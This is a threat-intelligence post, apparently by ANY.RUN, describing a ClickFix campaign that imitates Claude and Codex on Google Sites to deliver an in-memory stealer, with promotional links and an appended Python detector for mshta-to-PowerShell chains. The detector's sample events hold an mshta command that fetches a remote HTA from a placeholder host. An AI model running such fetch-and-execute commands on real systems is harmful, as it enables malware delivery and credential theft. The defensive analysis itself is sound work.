Fake Claude & Codex Deliver In-Memory Stealer: ClickFix via Google Sites

We’re tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure to deliver stealer #malware.

With no standalone executable dropped to disk and network activity appearing as legitimate powershell.exe traffic, the attack can significantly reduce visibility during the early stages of compromise.

Victims are directed to trusted sites[.]google[.]com pages and instructed to execute an mshta command. The attack results in in-memory stealer execution, theft of browser, email, and cryptocurrency wallet data, and outbound communication with attacker-controlled C2 infrastructure, while leaving fewer traditional detection opportunities for SOC teams.

Execution chain: Trusted Google Sites lure → User-executed mshta command → Multi-stage PowerShell delivery → Steganographic payload extraction from image → Shellcode deployment → In-memory execution inside powershell.exe → Browser, email & wallet data theft → C2 exfiltration

Using #ANYRUN Sandbox, investigate the full ClickFix execution chain, validate detection coverage, and observe PowerShell staging, steganographic payload delivery, and credential theft activity.

Explore the analysis sessions and collect IOCs:

Codex lure: https://app.any.run/tasks/151cfb30-5ef2-4962-a90e-58a59ecc43da/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice

Claude lure: https://app.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice

Track related ClickFix activity in #ANYRUN TI Lookup, identify additional Codex and Claude lures, and uncover related AI-themed ClickFix activity and infrastructure:

https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%2522query%2522:%2522url:%255C%2522https:/sites.google.com/*/cdx%255C%2522%2520or%2520url:%255C%2522https:/sites.google.com/*/clau%255C%2522%2522,%2522dateRange%2522:7%7D

https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%22query%22:%22ruleName:%5C%22AI-themed%20ClickFix%20phishing%20page%20has%20been%20detected%5C%22%22,%22dateRange%22:14%7D

Equip your SOC with stronger phishing detection and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoenterprise

#cybersecurity #infosec
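
Added example, not part of the original post and not ANY.RUN's detection logic: because the stealer runs inside powershell.exe with nothing dropped to disk, process lineage is one of the few early signals, so this sketch flags any PowerShell process descended from an mshta launch that was given a remote URL. The event fields, sample events and function name are constructed for illustration, and PIDs are assumed unique within the analysed window.

```python
import re
from ntpath import basename  # parses Windows paths on any OS

URL_RE = re.compile(r"https?://", re.IGNORECASE)
PS_NAMES = {"powershell.exe", "pwsh.exe"}
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# URLs and command lines are placeholders, not values from the sandbox sessions.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": MSHTA, "cmd": "mshta https://example.invalid/stage.hta"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c <placeholder>"},
    {"pid": 220, "ppid": 210, "image": PS, "cmd": "powershell.exe -Command <placeholder>"},
    # Benign look-alikes: a local HTA and an interactive PowerShell session.
    {"pid": 300, "ppid": 100, "image": MSHTA, "cmd": r"mshta C:\Tools\inventory.hta"},
    {"pid": 310, "ppid": 100, "image": PS, "cmd": "powershell.exe Get-Service"},
]

def proc_name(event):
    return basename(event["image"]).lower()

def find_mshta_powershell_chains(events):
    """Return one alert per PowerShell process whose ancestry contains
    an mshta.exe launch with an http(s) URL on its command line."""
    by_pid = {e["pid"]: e for e in events}
    remote_mshta = {e["pid"] for e in events
                    if proc_name(e) == "mshta.exe" and URL_RE.search(e["cmd"])}
    alerts = []
    for event in events:
        if proc_name(event) not in PS_NAMES:
            continue
        seen, cur = set(), event
        # Walk up the parent chain; 'seen' guards against PID loops in bad data.
        while cur is not None and cur["pid"] not in seen:
            seen.add(cur["pid"])
            if cur["ppid"] in remote_mshta:
                alerts.append({"powershell_pid": event["pid"],
                               "mshta_pid": cur["ppid"],
                               "mshta_cmd": by_pid[cur["ppid"]]["cmd"]})
                break
            cur = by_pid.get(cur["ppid"])
    return alerts

if __name__ == "__main__":
    for alert in find_mshta_powershell_chains(SAMPLE_EVENTS):
        print(alert)
```
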